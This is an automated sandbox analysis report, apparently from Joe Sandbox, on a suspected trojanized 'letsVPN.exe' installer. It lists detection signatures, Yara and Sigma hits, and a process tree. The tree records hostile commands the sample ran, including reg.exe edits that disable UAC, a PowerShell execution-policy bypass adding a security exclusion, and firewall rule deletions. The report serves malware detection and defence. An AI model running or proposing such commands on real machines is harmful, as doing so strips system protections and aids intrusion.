Windows Analysis Report
letsVPN.exe

Overview

General Information

Sample name: letsVPN.exe
Analysis ID: 1582024
MD5: ef0f5b020ea3238a98642cd7b56d84bb
SHA1: 9bfb209e7d43739cc9dea530680b0c4ecdbf5981
SHA256: abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
Tags: exe, user-aachum

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Disables UAC (PromptOnSecureDesktop)
Disables UAC (registry)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Tap Installer Execution
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • letsVPN.exe (PID: 1132 cmdline: "C:\Users\user\Desktop\letsVPN.exe" MD5: EF0F5B020EA3238A98642CD7B56D84BB)
    • cmd.exe (PID: 716 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 6312 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • netsh.exe (PID: 1340 cmdline: "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4824 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6252 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 5896 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 964 cmdline: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mmc.exe (PID: 5172 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • sinaplayer_service.exe (PID: 6368 cmdline: "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe" MD5: 68411B35F7B40B45AFC4A60A2681549D)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7248 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • mmc.exe (PID: 5904 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • letsvpn-latest.exe (PID: 4488 cmdline: "C:\ProgramData\letsvpn-latest.exe" MD5: 9F5F358AA1A85D222AD967F4538BC753)
      • powershell.exe (PID: 7632 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8044 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8096 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7256 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2528 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2724 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7324 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5936 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7412 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6596 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 6744 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6304 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5276 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4032 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • LetsPRO.exe (PID: 6956 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 1280 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
      • LetsPRO.exe (PID: 7484 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 4820 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
          • cmd.exe (PID: 7384 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 7796 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 7792 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ROUTE.EXE (PID: 7640 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
          • cmd.exe (PID: 8084 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ARP.EXE (PID: 6360 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
  • svchost.exe (PID: 8184 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 7284 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 7232 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 7068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2360 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 7624 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • LetsPRO.exe (PID: 7764 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Program Files (x86)\letsvpn\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: letsvpn-latest.exe PID: 4488 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
61.2.LetsPRO.exe.68890000.21.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source: Process started; Author: frack113; Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 7632, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 4820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LetsPRO
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 4820, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwgfpj3u.40z.ps1
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 1132, ParentProcessName: letsVPN.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, ProcessId: 964, ProcessName: cmd.exe
Source: Process started; Author: Daniil Yugoslavskiy, Ian Davis, oscd.community; Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 8044, ProcessName: tapinstall.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 7632, ProcessName: powershell.exe
Source: Process started; Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'; Data: Command: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 1132, ParentProcessName: letsVPN.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, ProcessId: 716, ProcessName: cmd.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2580, ProcessName: svchost.exe
              No Suricata rule has matched

              AV Detection

              Source: letsVPN.exe, Virustotal: Detection: 32%
              Source: letsVPN.exe, Joe Sandbox ML: detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. 
Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2444994668.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2460388898.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000015.00000003.2436159752.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
